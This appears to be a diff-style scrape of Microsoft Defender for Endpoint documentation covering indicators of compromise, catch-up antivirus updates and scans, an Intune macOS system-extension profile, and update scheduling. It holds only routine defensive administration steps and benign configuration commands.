-You can choose not to set a classification, or decide to specify whether an incident is true or false. Doing so helps the team see patterns and learn from them.
-
-### Add comments
-You can add comments and view historical events about an incident to see previous changes made to it.
-
-Whenever a change or comment is made to an alert, it is recorded in the Comments and history section.
-
-Added comments instantly appear on the pane.
---
-## Related topics
-- [Incidents queue](/microsoft-365/security/defender-endpoint/view-incidents-queue)-- [View and organize the Incidents queue](view-incidents-queue.md)-- [Investigate incidents](investigate-incidents.md)
security Manage Indicators https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/manage-indicators.md
- Title: Create indicators
-description: Create indicators for a file hash, IP address, URLs, or domains that define the detection, prevention, and exclusion of entities.
-------- m365-security-- tier2-- mde-edr-- Previously updated : 01/18/2024--
-# Create indicators
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](/microsoft-365/security/defender-endpoint/defender-endpoint-plan-1)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> [!TIP]
->
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://www.microsoft.com/WindowsForBusiness/windows-atp?ocid=docs-wdatp-automationexclusionlist-abovefoldlink)
-
-## Indicator of compromise (IoC) overview
-
-An Indicator of compromise (IoC) is a forensic artifact, observed on the network or host. An IoC indicates - with high confidence - a computer or network intrusion has occurred. IoCs are observable, which links them directly to measurable events. Some IoC examples include:
--- hashes of known malware-- signatures of malicious network traffic-- URLs or domains that are known malware distributors-
-To halt other compromise or prevent breaches of known IoCs, successful IoC tools should be able to detect all malicious data that is enumerated by the tool's rule set.
-IoC matching is an essential feature in every endpoint protection solution. This capability gives SecOps the ability to set a list of indicators for detection and for blocking (prevention and response).
-
-Organizations can create indicators that define the detection, prevention, and exclusion of IoC entities. You can define the action to be taken as well as the duration for when to apply the action, and the scope of the device group to apply it to.
-
-This video shows a walkthrough of creating and adding indicators:
-
-> [!VIDEO https://www.microsoft.com/en-us/videoplayer/embed/RE4qLVw]
-
-### About Microsoft indicators
-
-As a general rule, you should only create indicators for known bad IoCs, or for any files / websites that should be explicitly allowed in your organization. For more information on the types of sites that Defender for Endpoint can block by default, see [Microsoft Defender SmartScreen overview](/windows/security/threat-protection/microsoft-defender-smartscreen/microsoft-defender-smartscreen-overview).
-
-False Positive (FP) refers to a SmartScreen false positive, such that it's considered to be malware or phish, but actually isn't a threat, so you want to create an allow policy for it.
-
-You can also help drive improvements to Microsoft's security intelligence by submitting false positives, and suspicious or known-bad IoCs for analysis. If a warning or block is incorrectly shown for a file or application, or if you suspect an undetected file is malware, you can submit a file to Microsoft for review. For more information, see [Submit files for analysis](https://www.microsoft.com/en-us/wdsi/filesubmission/).
-
-#### IP/URL indicators
-
-You can use IP/URL indicators to unblock users from a SmartScreen false positive (FP) or to override a Web Content Filtering (WFC) block.
-
-You can use URL and IP indicators to manage site access. You can create interim IP and URL indicators to temporarily unblock users from a SmartScreen block. You might also have indicators that you keep for a long period of time to selectively bypass web content filtering blocks.
-
-Consider the case where you have a web content filtering categorization for a particular site that is correct. In this example, you have web content filtering set to block all social media, which is correct for your overall organizational goals. However, the marketing team has a real need to use a specific social media site for advertising and announcements. In that case, you can unblock the specific social media site using IP or URL indicators for the specific group (or groups) to use.
-
-See [Web protection](web-protection-overview.md) and [Web content filtering](web-content-filtering.md)
-
-## IP/URL Indicators: Network protection and the TCP three-way handshake
-
-With network protection, the determination of whether to allow or block access to a site is made after the completion of the [three-way handshake via TCP/IP](/troubleshoot/windows-server/networking/three-way-handshake-via-tcpip). Thus, when a site is blocked by network protection, you might see an action type of `ConnectionSuccess` under `NetworkConnectionEvents` in the Microsoft Defender portal, even though the site was blocked. `NetworkConnectionEvents` are reported from the TCP layer, and not from network protection. After the three-way handshake has completed, access to the site is allowed or blocked by network protection.
-
-Here's an example of how that works:
-
-1. Suppose that a user attempts to access a website on their device. The site happens to be hosted on a dangerous domain, and it should be blocked by network protection.
-
-2. The three-way handshake via TCP/IP commences. Before it completes, a `NetworkConnectionEvents` action is logged, and its `ActionType` is listed as `ConnectionSuccess`. However, as soon as the three-way handshake process completes, network protection blocks access to the site. All of this happens quickly. A similar process occurs with [Microsoft Defender SmartScreen](/windows/security/threat-protection/microsoft-defender-smartscreen/microsoft-defender-smartscreen-overview); it's when the three-way handshake completes that a determination is made, and access to a site is either blocked or allowed.
-
-3. In the Microsoft Defender portal, an alert is listed in the [alerts queue](alerts-queue.md). Details of that alert include both `NetworkConnectionEvents` and `AlertEvents`. You can see that the site was blocked, even though you also have a `NetworkConnectionEvents` item with the ActionType of `ConnectionSuccess`.
-
-#### File hash indicators
-
-In some cases, creating a new indicator for a newly identified file IoC - as an immediate stop-gap measure - might be appropriate to block files or even applications. However, using indicators to attempt to block an application might not provide the expected results as applications are typically composed of many different files. The preferred methods of blocking applications are to use [Windows Defender Application Control (WDAC)](/windows/security/threat-protection/windows-defender-application-control/wdac-and-applocker-overview) or AppLocker.
-
-Because each version of an application has a different file hash, using indicators to block hashes isn't recommended.
-
-[Windows Defender Application Control (WDAC)](/windows/security/threat-protection/windows-defender-application-control/select-types-of-rules-to-create)
-
-#### Certificate indicators
-
-In some cases, a specific certificate that's used to sign a file or application that your organization is set to allow or block. Certificate indicators are supported in Defender for Endpoint, if they use the .CER or .PEM file format. See [Create indicators based on certificates](indicator-certificates.md) for more details.
-
-## IoC detection engines
-
-Currently, the supported Microsoft sources for IoCs are:
--- [Cloud detection engine](#cloud-detection-engine) of Defender for Endpoint-- [Automated investigation and remediation (AIR) engine](#automated-investigation-and-remediation-engine) in Microsoft Defender for Endpoint-- [Endpoint prevention engine](#endpoint-prevention-engine) (Microsoft Defender Antivirus)-
-## Cloud detection engine
-
-The cloud detection engine of Defender for Endpoint regularly scans collected data and tries to match the indicators you set. When there's a match, action is taken according to the settings you specified for the IoC.
-
-## Endpoint prevention engine
-
-The same list of indicators is honored by the prevention agent. Meaning, if Microsoft Defender Antivirus is the primary antivirus configured, the matched indicators are treated according to the settings. For example, if the action is "Alert and Block", Microsoft Defender Antivirus prevents file executions (block and remediate) and a corresponding alert appears. On the other hand, if the Action is set to "Allow", Microsoft Defender Antivirus doesn't detect or block the file.
-
-## Automated investigation and remediation engine
-
-The automated investigation and remediation behave similarly to the endpoint prevention engine. If an indicator is set to "Allow", automated investigation and remediation ignores a "bad" verdict for it. If set to "Block", automated investigation and remediation treats it as "bad".
-
-The `EnableFileHashComputation` setting computes the file hash for the cert and file IoC during file scans. It supports IoC enforcement of hashes and certs belong to trusted applications. It's concurrently enabled with the allow or block file setting. `EnableFileHashComputation` is enabled manually through Group Policy, and is disabled by default.
-
-## Enforcement types for Indicators
-
-When your security team creates a new indicator (IoC), the following actions are available:
--- **Allow** ΓÇô the IoC is allowed to run on your devices.-- **Audit** ΓÇô an alert is triggered when the IoC runs.-- **Warn** ΓÇô the IoC prompts a warning that the user can bypass-- **Block execution** - the IoC won't be allowed to run.-- **Block and remediate** - the IoC won't be allowed to run and a remediation action will be applied to the IoC.-
-> [!NOTE]
-> Using Warn mode will prompt your users with a warning if they open a risky app or website. The prompt won't block them from allowing the application or website to run, but you can provide a custom message and links to a company page that describes appropriate usage of the app. Users can still bypass the warning and continue to use the app if they need. For more information, see Govern apps discovered by Microsoft Defender for Endpoint.
-
-You can create an indicator for:
--- [Files](indicator-file.md)-- [IP addresses](indicator-ip-domain.md)-- [URLs/domains](indicator-ip-domain.md)-- [Certificates](indicator-certificates.md)-
-The table below shows exactly which actions are available per indicator (IoC) type:
-
-| IoC type | Available actions |
-|:|:|
-| [Files](indicator-file.md) | Allow <br> Audit <br> Warn <br> Block execution <br> Block and remediate |
-| [IP addresses](indicator-ip-domain.md) | Allow <br> Audit <br> Warn <br> Block execution |
-| [URLs and domains](indicator-ip-domain.md) | Allow <br> Audit <br> Warn <br> Block execution |
-| [Certificates](indicator-certificates.md) | Allow <br> Block and remediate |
-
-The functionality of pre-existing IoCs won't change. However, the indicators were renamed to match the current supported response actions:
--- The "alert only" response action was renamed to "audit" with the generated alert setting enabled.-- The "alert and block" response was renamed to "block and remediate" with the optional generate alert setting.-
-The IoC API schema and the threat IDs in advance hunting are updated to align with the renaming of the IoC response actions. The API scheme changes apply to all IoC Types.
-
-> [!NOTE]
->
-> There is a limit of 15,000 indicators per tenant. File and certificate indicators do not block [exclusions defined for Microsoft Defender Antivirus](/windows/security/threat-protection/microsoft-defender-antivirus/configure-exclusions-microsoft-defender-antivirus). Indicators are not supported in Microsoft Defender Antivirus when it is in passive mode.
->
-> The format for importing new indicators (IoCs) has changed according to the new updated actions and alerts settings. We recommend downloading the new CSV format that can be found at the bottom of the import panel.
-
-## Known issues and limitations
-
-Customers might experience issues with alerts for Indicators of Compromise. The following scenarios are situations where alerts aren't created or are created with inaccurate information. Each issue is investigated by our engineering team.
--- **Block indicators** ΓÇô Generic alerts with informational severity only will be fired. Custom alerts (that is, custom title and severity) aren't fired in these cases.-- **Warn indicators** ΓÇô Generic alerts and custom alerts are possible in this scenario, however, the results aren't deterministic due to an issue with the alert detection logic. In some cases, customers might see a generic alert, whereas a custom alert might show in other cases.-- **Allow** ΓÇô No alerts are generated (by design).-- **Audit** - Alerts are generated based on the severity provided by the customer.-- In some cases, alerts coming from EDR detections might take precedence over alerts stemming from antivirus blocks, in which case an information alert will be generated.-
-Microsoft Store apps cannot be blocked by Defender because they're signed by Microsoft.
-
-## Related articles
--- [Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](defender-endpoint-antivirus-exclusions.md)-- [Create contextual IoC](respond-file-alerts.md#add-indicator-to-block-or-allow-a-file)-- [Use the Microsoft Defender for Endpoint indicators API](ti-indicator.md)-- [Use partner integrated solutions](partner-applications.md)---
security Manage Outdated Endpoints Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/manage-outdated-endpoints-microsoft-defender-antivirus.md
- Title: Apply Microsoft Defender Antivirus protection updates to out of date endpoints
-description: Define when and how updates should be applied for endpoints that haven't updated in a while.
----------- m365-security-- tier3 Previously updated : 04/08/2021--
-# Manage Microsoft Defender Antivirus updates and scans for endpoints that are out of date
-
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- Microsoft Defender Antivirus-
-**Platforms**
--- Windows-
-With Microsoft Defender Antivirus, your security team can define how long an endpoint can avoid an update or how many scans it can miss before it's required to receive the update and run a scan. This capability is especially useful in environments where devices aren't often connected to a corporate or external network, or for devices that aren't used on a daily basis.
-
-For example, an employee who uses a particular computer takes three days off of work, and doesn't sign on their computer during that time. When the employee returns to work and signs into their computer, Microsoft Defender Antivirus will immediately check and download the latest protection updates, and then run a scan.
-
-## Set up catch-up protection updates for endpoints that haven't updated for a while
-
-If Microsoft Defender Antivirus didn't download protection updates for a specified period, you can set it up to automatically check and download the latest update the next time someone signs in on an endpoint. This configuration is useful if you have [globally disabled automatic update downloads on startup](manage-event-based-updates-microsoft-defender-antivirus.md).
-
-You can use one of several methods to set up catch-up protection updates:
--- [Configuration Manager](#use-configuration-manager-to-configure-catch-up-protection-updates)-- [Group Policy](#use-group-policy-to-enable-and-configure-the-catch-up-update-feature)-- [PowerShell cmdlets](#use-powershell-cmdlets-to-configure-catch-up-protection-updates)-- [Windows Management Instruction (WMI)](#use-windows-management-instruction-wmi-to-configure-catch-up-protection-updates)-
-### Use Configuration Manager to configure catch-up protection updates
-
-1. On your Microsoft Configuration Manager console, open the antimalware policy you want to change (select **Assets and Compliance** in the navigation pane on the left, then expand the tree to **Overview** \> **Endpoint Protection** \> **Antimalware Policies**)
-
-2. Go to the **Security intelligence updates** section and configure the following settings:
-
- - Set **Force a security intelligence update if the client computer is offline for more than two consecutive scheduled updates** to **Yes**.
- - For the **If Configuration Manager is used as a source for security intelligence updates...**, specify the hours before which the protection updates delivered by Configuration Manager should be considered out of date. This setting causes the next update location to be used, based on the defined [fallback source order](manage-protection-updates-microsoft-defender-antivirus.md#fallback-order).
-
-3. Select **OK**.
-
-4. [Deploy the updated policy as usual](/sccm/protect/deploy-use/endpoint-antimalware-policies#deploy-an-antimalware-policy-to-client-computers).
-
-### Use Group Policy to enable and configure the catch-up update feature
-
-1. On your Group Policy management computer, open the [Group Policy Management Console](/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc731212(v=ws.11)), right-click the Group Policy Object you want to configure and then select **Edit**.
-
-2. In the **Group Policy Management Editor** go to **Computer configuration**.
-
-3. Select **Policies** then **Administrative templates**.
-
-4. Expand the tree to **Windows components > Microsoft Defender Antivirus > Signature Updates**.
-
-5. Double-click the **Define the number of days after which a catch-up security intelligence update is required** setting and set the option to **Enabled**. Enter the number of days after which you want Microsoft Defender Antivirus to check for and download the latest protection update.
-
-6. Select **OK**.
-
-### Use PowerShell cmdlets to configure catch-up protection updates
-
-Use the following cmdlet:
-
-```PowerShell
-Set-MpPreference -SignatureUpdateCatchupInterval
-```
-
-For more information about using PowerShell with Microsoft Defender Antivirus, see the following articles:
--- [Use PowerShell cmdlets to configure and run Microsoft Defender Antivirus](use-powershell-cmdlets-microsoft-defender-antivirus.md)-- [Defender Antivirus cmdlets](/powershell/module/defender/)-
-### Use Windows Management Instruction (WMI) to configure catch-up protection updates
-
-Use the [**Set** method of the **MSFT_MpPreference**](/previous-versions/windows/desktop/legacy/dn455323(v=vs.85)) class for the following properties:
-
-```WMI
-SignatureUpdateCatchupInterval
-```
-
-See the following article for more information and allowed parameters:
--- [Windows Defender WMIv2 APIs](/previous-versions/windows/desktop/defender/windows-defender-wmiv2-apis-portal)-
-## Set the number of days before protection is reported as out of date
-
-You can also specify the number of days after which Microsoft Defender Antivirus protection is considered old or out of date. After the specified number of days, the client will report itself as "out of date" and will show an error to the endpoint user. When an endpoint is considered out of date, Microsoft Defender Antivirus might attempt to download an update from other sources (based on the defined [fallback source order](manage-protection-updates-microsoft-defender-antivirus.md#fallback-order)).
-
-You can use Group Policy to specify the number of days after which endpoint protection is considered to be out of date.
-
-### Use Group Policy to specify the number of days before protection is considered out of date
-
-1. On your Group Policy management machine, open the [Group Policy Management Console](/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc731212(v=ws.11)), right-click the Group Policy Object you want to configure and then select **Edit**.
-
-2. In the **Group Policy Management Editor** go to **Computer configuration**.
-
-3. Select **Policies** then **Administrative templates**.
-
-4. Expand the tree to **Windows components > Microsoft Defender Antivirus > Signature Updates** and configure the following settings:
-
- 1. Double-click **Define the number of days before spyware definitions are considered out of date** and set the option to **Enabled**. Enter the number of days after which you want Microsoft Defender Antivirus to consider spyware Security intelligence to be out of date.
-
- 2. Select **OK**.
-
- 3. Double-click **Define the number of days before virus definitions are considered out of date** and set the option to **Enabled**. Enter the number of days after which you want Microsoft Defender Antivirus to consider virus Security intelligence to be out of date.
-
- 4. Select **OK**.
-
-## Set up catch-up scans for endpoints that have not been scanned for a while
-
-You can set the number of consecutive scheduled scans that can be missed before Microsoft Defender Antivirus will force a scan.
-
-The process for enabling this feature is:
-
-1. Set up at least one scheduled scan (see the [Scheduled scans](scheduled-catch-up-scans-microsoft-defender-antivirus.md) article).
-
-2. Enable the catch-up scan feature.
-
-3. Define the number of scans that can be skipped before a catch-up scan occurs.
-
-This feature can be enabled for both full and quick scans.
-
-> [!TIP]
-> We recommend using quick scans for most situations. To learn more, see [Quick scan, full scan, and custom scan](schedule-antivirus-scans.md#comparing-the-quick-scan-full-scan-and-custom-scan).
-
-You can use one of several methods to set up catch-up scans:
--- [Group Policy](#use-group-policy-to-enable-and-configure-the-catch-up-scan-feature)-- [Use PowerShell cmdlets to configure catch-up scans](#use-powershell-cmdlets-to-configure-catch-up-scans)-- [Windows Management Instruction (WMI)](#use-windows-management-instruction-wmi-to-configure-catch-up-scans)-- [Configuration Manager](#use-configuration-manager-to-configure-catch-up-scans)-
-### Use Group Policy to enable and configure the catch-up scan feature
-
-1. Ensure you have set up at least one scheduled scan.
-
-2. On your Group Policy management machine, open the [Group Policy Management Console](/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc731212(v=ws.11)), right-click the Group Policy Object you want to configure and select **Edit**.
-
-3. In the **Group Policy Management Editor** go to **Computer configuration**.
-
-4. Select **Policies** then **Administrative templates**.
-
-5. Expand the tree to **Windows components > Microsoft Defender Antivirus > Scan** and configure the following settings:
-
- - If you have set up scheduled quick scans, double-click the **Turn on catch-up quick scan** setting and set the option to **Enabled**.
- - If you have set up scheduled full scans, double-click the **Turn on catch-up full scan** setting and set the option to **Enabled**. Select **OK**.
- - Double-click the **Define the number of days after which a catch-up scan is forced** setting and set the option to **Enabled**.
- - Enter the number of scans that can be missed before a scan will be automatically run when the user next signs in on the endpoint. The type of scan that is run is determined by the **Specify the scan type to use for a scheduled scan** (see the [Schedule scans](scheduled-catch-up-scans-microsoft-defender-antivirus.md) article). Select **OK**.
-
-> [!NOTE]
-> The Group Policy setting title refers to the number of days. The setting, however, is applied to the number of scans (not days) before the catch-up scan will be run.
-
-### Use PowerShell cmdlets to configure catch-up scans
-
-Use the following cmdlets:
-
-```PowerShell
-Set-MpPreference -DisableCatchupFullScan
-Set-MpPreference -DisableCatchupQuickScan
-
-```
-
-For more information about using PowerShell with Microsoft Defender Antivirus, see the following articles:
--- [Use PowerShell cmdlets to manage Microsoft Defender Antivirus](use-powershell-cmdlets-microsoft-defender-antivirus.md) -- [Defender Antivirus cmdlets](/powershell/module/defender/)-
-### Use Windows Management Instruction (WMI) to configure catch-up scans
-
-Use the [**Set** method of the **MSFT_MpPreference**](/previous-versions/windows/desktop/legacy/dn455323(v=vs.85)) class for the following properties:
-
-```WMI
-DisableCatchupFullScan
-DisableCatchupQuickScan
-```
-
-See the following article for more information and allowed parameters:
--- [Windows Defender WMIv2 APIs](/previous-versions/windows/desktop/defender/windows-defender-wmiv2-apis-portal)-
-### Use Configuration Manager to configure catch-up scans
-
-1. On your Microsoft Configuration Manager console, open the antimalware policy you want to change (select **Assets and Compliance** in the navigation pane on the left, then expand the tree to **Overview** \> **Endpoint Protection** \> **Antimalware Policies**)
-
-2. Go to the **Scheduled scans** section and **Force a scan of the selected scan type if client computer is offline...** to **Yes**.
-
-3. Select **OK**.
-
-4. [Deploy the updated policy as usual](/sccm/protect/deploy-use/endpoint-antimalware-policies#deploy-an-antimalware-policy-to-client-computers).
-
-> [!TIP]
-> If you're looking for Antivirus related information for other platforms, see:
-> - [Set preferences for Microsoft Defender for Endpoint on macOS](mac-preferences.md)
-> - [Microsoft Defender for Endpoint on Mac](microsoft-defender-endpoint-mac.md)
-> - [macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune](/mem/intune/protect/antivirus-microsoft-defender-settings-macos)
-> - [Set preferences for Microsoft Defender for Endpoint on Linux](linux-preferences.md)
-> - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md)
-> - [Configure Defender for Endpoint on Android features](android-configure.md)
-> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
-
-## Related articles
--- [Deploy Microsoft Defender Antivirus](deploy-manage-report-microsoft-defender-antivirus.md)-- [Manage Microsoft Defender Antivirus updates and apply baselines](microsoft-defender-antivirus-updates.md)-- [Manage when protection updates should be downloaded and applied](manage-protection-update-schedule-microsoft-defender-antivirus.md)-- [Manage event-based forced updates](manage-event-based-updates-microsoft-defender-antivirus.md)-- [Manage updates for mobile devices and virtual machines (VMs)](manage-updates-mobile-devices-vms-microsoft-defender-antivirus.md)-- [Microsoft Defender Antivirus in Windows 10](microsoft-defender-antivirus-in-windows-10.md)
security Manage Profiles Approve Sys Extensions Intune https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/manage-profiles-approve-sys-extensions-intune.md
- Title: Manage profiles and approve extensions using Intune
-description: Manage profiles and approve extensions using Intune for Microsoft Defender for Endpoint to work properly on macOS.
------- m365-security-- tier3- Previously updated : 08/28/2023--
-# Manage profiles and approve extensions using Intune
-
-This article describes the procedures to follow to manage profiles properly using the Intune management tool.
-
-## Intune
-
-### Intune System Extensions Policy
-
-To approve the system extensions:
-
-1. In Intune, select **Manage > Device configuration**, and then select **Manage > Profiles > Create Profile**.
-1. Choose a name for the profile. Change **Platform=macOS** to **Profile type=Extensions**, and then select **Create**.
-1. In the **Basics** tab, give a name to this new profile.
-1. In the **Configuration settings** tab, add the following entries in the **Allowed system extensions** section:
-
- |Bundle identifier |Team identifier |
- |||
- |com.microsoft.wdav.epsext | UBF8T346G9 |
- |com.microsoft.wdav.netext | UBF8T346G9 |
-
- :::image type="content" source="media/entries-in-configuration-settings-tab.png" alt-text="Adding entries in the Configuration settings tab." lightbox="media/entries-in-configuration-settings-tab.png":::
-
-1. In the **Assignments** tab, assign this profile to **All Users & All devices**.
-1. Review and create this configuration profile.
-
-### Create the custom configuration profile
-
-The custom configuration profile enables the network extension and grants Full Disk Access to the Endpoint Security system extension.
-
-1. Save the following content to a file named *sysext.xml*:
-
-```powershell
- <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
-<plist version="1">
- <dict>
- <key>PayloadUUID</key>
- <string>7E53AC50-B88D-4132-99B6-29F7974EAA3C</string>
- <key>PayloadType</key>
- <string>Configuration</string>
- <key>PayloadOrganization</key>
- <string>Microsoft Corporation</string>
- <key>PayloadIdentifier</key>
- <string>7E53AC50-B88D-4132-99B6-29F7974EAA3C</string>
- <key>PayloadDisplayName</key>
- <string>Microsoft Defender System Extensions</string>
- <key>PayloadDescription</key>
- <string/>
- <key>PayloadVersion</key>
- <integer>1</integer>
- <key>PayloadEnabled</key>
- <true/>
- <key>PayloadRemovalDisallowed</key>
- <true/>
- <key>PayloadScope</key>
- <string>System</string>
- <key>PayloadContent</key>
- <array>
- <dict>
- <key>PayloadUUID</key>
- <string>2BA070D9-2233-4827-AFC1-1F44C8C8E527</string>
- <key>PayloadType</key>
- <string>com.apple.webcontent-filter</string>
- <key>PayloadOrganization</key>
- <string>Microsoft Corporation</string>
- <key>PayloadIdentifier</key>
- <string>CEBF7A71-D9A1-48BD-8CCF-BD9D18EC155A</string>
- <key>PayloadDisplayName</key>
- <string>Approved Network Extension</string>
- <key>PayloadDescription</key>
- <string/>
- <key>PayloadVersion</key>
- <integer>1</integer>
- <key>PayloadEnabled</key>
- <true/>
- <key>FilterType</key>
- <string>Plugin</string>
- <key>UserDefinedName</key>
- <string>Microsoft Defender Network Extension</string>
- <key>PluginBundleID</key>
- <string>com.microsoft.wdav</string>
- <key>FilterSockets</key>
- <true/>
- <key>FilterDataProviderBundleIdentifier</key>
- <string>com.microsoft.wdav.netext</string>
- <key>FilterDataProviderDesignatedRequirement</key>
- <string>identifier &quot;com.microsoft.wdav.netext&quot; and anchor apple generic and certificate 1[field.1.2.840.113635.100.6.2.6] /* exists */ and certificate leaf[field.1.2.840.113635.100.6.1.13] /* exists */ and certificate leaf[subject.OU] = UBF8T346G9</string>
- </dict>
- <dict>
- <key>PayloadUUID</key>
- <string>56105E89-C7C8-4A95-AEE6-E11B8BEA0366</string>
- <key>PayloadType</key>
- <string>com.apple.TCC.configuration-profile-policy</string>
- <key>PayloadOrganization</key>
- <string>Microsoft Corporation</string>
- <key>PayloadIdentifier</key>
- <string>56105E89-C7C8-4A95-AEE6-E11B8BEA0366</string>
- <key>PayloadDisplayName</key>
- <string>Privacy Preferences Policy Control</string>
- <key>PayloadDescription</key>
- <string/>
- <key>PayloadVersion</key>
- <integer>1</integer>
- <key>PayloadEnabled</key>
- <true/>
- <key>Services</key>
- <dict>
- <key>SystemPolicyAllFiles</key>
- <array>
- <dict>
- <key>Identifier</key>
- <string>com.microsoft.wdav.epsext</string>
- <key>CodeRequirement</key>
- <string>identifier "com.microsoft.wdav.epsext" and anchor apple generic and certificate 1[field.1.2.840.113635.100.6.2.6] /* exists */ and certificate leaf[field.1.2.840.113635.100.6.1.13] /* exists */ and certificate leaf[subject.OU] = UBF8T346G9</string>
- <key>IdentifierType</key>
- <string>bundleID</string>
- <key>StaticCode</key>
- <integer>0</integer>
- <key>Allowed</key>
- <integer>1</integer>
- </dict>
- </array>
- </dict>
- </dict>
- </array>
- </dict>
-</plist>
-```
-
-Verify that the above content was copied into the file correctly. From terminal, run the following command and verify that it outputs to the result as shown in the following example:
-
-```powershell-interactive
-$ plutil -lint sysext.xml
-sysext.xml: OK
-```
-
-### Deploy this custom configuration profile
-
-1. In Intune, select **Manage > Device configuration**, and then select **Manage > Profiles > Create profile**.
-1. Choose a name for the profile. For the **Platform** attribute, set the value as **macOS** and for the **Profile type** attribute, set the value as **Custom**, and then select **Configure**. The file *sysext.xml* is created.
-1. Open the configuration profile and upload the *sysext.xml* file.
-1. Select **OK**.
--
-5. In the **Assignments** tab, assign this profile to **All Users & All devices**.
-6. Review and create this configuration profile.
security Manage Protection Update Schedule Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/manage-protection-update-schedule-microsoft-defender-antivirus.md
- Title: Schedule Microsoft Defender Antivirus protection updates
-description: Schedule the day, time, and interval for when protection updates should be downloaded
- Previously updated : 12/20/2022---------- m365-security-- tier2--
-# Manage the schedule for when protection updates should be downloaded and applied
-
-> [!IMPORTANT]
-> Customers who applied the March 2022 Microsoft Defender engine update (**1.1.19100.5**) might have encountered high resource utilization (CPU and/or memory). Microsoft has released an update (**1.1.19200.5**) that resolves the bugs introduced in the earlier version. Customers are recommended to update to this new engine build of Antivirus Engine (**1.1.19200.5**). To ensure any performance issues are fully fixed, it is recommended to reboot machines after applying update. For more information, see [Monthly platform and engine versions](microsoft-defender-antivirus-updates.md#monthly-platform-and-engine-versions).
-
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- Microsoft Defender Antivirus-
-**Platforms**
-- Windows-
-Microsoft Defender Antivirus lets you determine when it should look for and download updates.
-
-You can schedule updates for your endpoints by:
--- Specifying the day of the week to check for protection updates-- Specifying the interval to check for protection updates-- Specifying the time to check for protection updates-
-You can also randomize the times when each endpoint checks and downloads protection updates. See the [Schedule scans](scheduled-catch-up-scans-microsoft-defender-antivirus.md) topic for more information.
-
-## Use Configuration Manager to schedule protection updates
-
-1. On your Microsoft Configuration Manager console, open the antimalware policy you want to change (click **Assets and Compliance** in the navigation pane on the left, then expand the tree to **Overview** \> **Endpoint Protection** \> **Antimalware Policies**)
-
-2. Go to the **Security intelligence updates** section.
-
-3. To check and download updates at a certain time:
-
- - Set **Check for Endpoint Protection security intelligence updates at a specific interval...** to **0**.
- - Set **Check for Endpoint Protection security intelligence updates daily at...** to the time when updates should be checked.
-
-4. To check and download updates on a continual interval, Set **Check for Endpoint Protection security intelligence updates at a specific interval...** to the number of hours that should occur between updates.
-
-5. [Deploy the updated policy as usual](/sccm/protect/deploy-use/endpoint-antimalware-policies#deploy-an-antimalware-policy-to-client-computers).
-
-## Use Group Policy to schedule protection updates
-
-> [!IMPORTANT]
-> By default, "SignatureScheduleDay" is set as "8" and "SignatureUpdateInterval" is set as "0" so Microsoft Defender Antivirus will not schedule protection updates.
-Enabling these settings will override that default.
-
-1. On your Group Policy management machine, open the [Group Policy Management Console](/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc731212(v=ws.11)), right-click the Group Policy Object you want to configure and click **Edit**.
-
-2. In the **Group Policy Management Editor** go to **Computer configuration**.
-
-3. Click **Policies** then **Administrative templates**.
-
-4. Expand the tree to **Windows components** \> **Microsoft Defender Antivirus** \> **Security Intelligence Updates** and configure the following settings:
-
- 1. Double-click the **Specify the day of the week to check for security intelligence updates** setting and set the option to **Enabled**. Enter the day of the week to check for updates. Click **OK**.
-
- 2. Double-click the **Specify the interval to check for security intelligence updates** setting and set the option to **Enabled**. Enter the number of hours between updates. Click **OK**.
-
- 3. Double-click the **Specify the time to check for security intelligence updates** setting and set the option to **Enabled**. Enter the time when updates should be checked. The time is based on the local time of the endpoint. Click **OK**.
-
-## Use PowerShell cmdlets to schedule protection updates
-
-Use the following cmdlets:
-
-```PowerShell
-Set-MpPreference -SignatureScheduleDay
-Set-MpPreference -SignatureScheduleTime
-Set-MpPreference -SignatureUpdateInterval
-```
-
-See [Use PowerShell cmdlets to configure and run Microsoft Defender Antivirus](use-powershell-cmdlets-microsoft-defender-antivirus.md) and [Defender Antivirus cmdlets](/powershell/module/defender/) for more information on how to use PowerShell with Microsoft Defender Antivirus.
-
-## Use Windows Management Instruction (WMI) to schedule protection updates
-
-Use the [**Set** method of the **MSFT_MpPreference**](/previous-versions/windows/desktop/legacy/dn455323(v=vs.85)) class for the following properties:
-
-```WMI
-SignatureScheduleDay
-SignatureScheduleTime
-SignatureUpdateInterval
-```
-
-See the following for more information and allowed parameters:
--- [Windows Defender WMIv2 APIs](/previous-versions/windows/desktop/defender/windows-defender-wmiv2-apis-portal)-
-> [!TIP]
-> If you're looking for Antivirus related information for other platforms, see:
-> - [Set preferences for Microsoft Defender for Endpoint on macOS](mac-preferences.md)
-> - [Microsoft Defender for Endpoint on Mac](microsoft-defender-endpoint-mac.md)
-> - [macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune](/mem/intune/protect/antivirus-microsoft-defender-settings-macos)
